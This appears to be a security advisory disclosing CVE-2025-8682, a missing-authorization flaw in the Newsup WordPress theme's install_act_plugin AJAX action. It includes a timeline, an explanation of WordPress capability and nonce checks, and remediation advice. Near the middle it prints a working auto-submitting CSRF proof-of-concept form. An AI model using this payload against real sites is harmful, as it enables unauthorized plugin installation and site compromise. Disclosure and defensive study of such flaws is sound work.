Newsup is a magazine-style WordPress theme with more than 30,000 active installations, prized for its demo importer and “one-click extras” that streamline editorial site setup. During security testing we identified CVE-2025-8682, a high-impact Missing Authorization flaw: the theme exposes an AJAX action named install_act_plugin that can be invoked by low-privileged users (Subscriber+) and, in some deployments, even unauthenticated visitors. Because the handler does not enforce a capability check (e.g., install_plugins / manage_options) and is callable without a CSRF nonce, attackers can silently initiate plugin installation/activation flows, introducing untrusted code into the site.

CVECVE-2025-8682
Plugin VersionNewsup <= 5.0.10
CriticalHigh
All TimeN/A
Active installations30 000+
Publicly PublishedOctober 9, 2025
Last UpdatedOctober 9, 2025
ResearcherDmitrii Ignatyev
PoCYes
ExploitNo
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8682
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/newsup/newsup-5010-missing-authorization-to-authenticated-subscriber-plugin-installation
Plugin Security Certification by CleanTalk
Logo of the plugin

Join the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.

PSC by Cleantalk

Timeline

July 29, 2025Plugin testing and vulnerability detection in the Newsup have been completed
July 29, 2025I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
October 9, 2025Registered CVE-2025-8682

Discovery of the Vulnerability

A review of the Newsup admin integration revealed a convenience endpoint wired to admin-ajax.php?action=install_act_plugin. Unlike secure implementations that guard such actions behind both a nonce (to prevent CSRF) and a capability check (to restrict access to Administrators), the Newsup code path accepts the request and proceeds with installation logic based solely on the presence of the action parameter. As a result, a Subscriber—or any user with a valid session—and in some configurations even a non-logged visitor, can execute the action by submitting a trivial POST. In the wild, this is particularly risky because many hosting stacks do not block unauthenticated admin-ajax.php access.

Understanding of CSRF attack’s

WordPress hardens privileged actions through two independent gates: (1) capabilities checked via current_user_can()to ensure the caller is an Administrator (or another appropriate role); and (2) nonces validated with check_ajax_referer() to defeat cross-site request forgery. Numerous historical CVEs arise when developers add only one control or skip both. Themes that expose “install/activate recommended plugin” buttons through AJAX without those checks allow low-privileged users (or unauthenticated browsers through CSRF) to install arbitrary packages. CVE-2025-8682 fits this pattern exactly: a state-changing AJAX bridge that trusts the request and browser context and never verifies that the caller is allowed to install plugins.

Exploiting the CSRF Vulnerability

To exploit CVE-2025-8682, an attacker with no cookies:

POC:

<html>
  <body>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="install&#95;act&#95;plugin" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

____

The ability to install or activate plugins without administrative approval is tantamount to remote code execution by proxy. An attacker could deploy a backdoored plugin to establish persistence, create new admin users, siphon data, inject SEO spam, or add web shells. On news portals and high-traffic magazines, silent installation of malicious extensions can lead to widespread phishing (malicious widgets/links), ad fraud, unauthorized redirects, or full site defacement. Because the action is easy to repeat, a single campaign can re-install the payload after cleanup, causing recurring incidents and damaging brand trust and ad partnerships.

Recommendations for Improved Security

Update Newsup to the patched release as soon as it’s available.

Harden: deploy a WAF rule to block action=install_act_plugin from untrusted origins; consider SameSite=Lax/Strict for auth cookies to reduce CSRF surface.

Minimize admins and remove stale accounts; require MFA.

Monitor plugin changes using file integrity and plugin-install hooks, and configure alerts for unexpected install/activate events.

By taking proactive measures to address CSRF vulnerabilities like CVE-2025-8682 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

Dmitrii I.
CVE-2025-8682 – Newsup – Missing Authorization to Authenticated (Subscriber+) Plugin Installation – POC

Leave a Reply

Your email address will not be published. Required fields are marked *